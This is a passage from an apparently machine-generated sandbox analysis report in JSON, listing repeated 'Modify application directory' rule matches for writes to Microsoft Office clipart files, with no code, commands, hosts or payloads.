files\\microsoft office\\clipart\\pub60cor\\j0099170.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34041", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099170.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099171.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34050", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099171.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099172.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34057", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099172.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099173.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34070", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099173.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099174.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34081", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099174.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099175.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34088", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099175.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099176.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34095", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099176.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099177.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34102", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099177.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099178.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34109", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099178.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099179.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34116", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099179.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099180.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34123", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099180.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099181.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34130", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099181.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099182.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34137", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099182.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099183.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34144", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099183.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099184.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34151", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099184.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099185.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34158", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099185.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099186.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34165", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099186.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099187.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34174", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099187.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099188.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34183", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099188.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099189.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34190", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099189.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099190.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34197", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099190.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099191.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34208", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099191.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099192.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34221", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099192.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099193.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34230", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099193.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099194.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34241", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099194.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099195.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34250", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099195.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099196.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34259", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099196.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099197.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34266", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099197.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099198.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34273", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099198.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099199.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34280", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099199.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099200.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34291", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099200.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099201.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34300", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099201.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099202.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34313", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099202.gif\".", "technique_path": 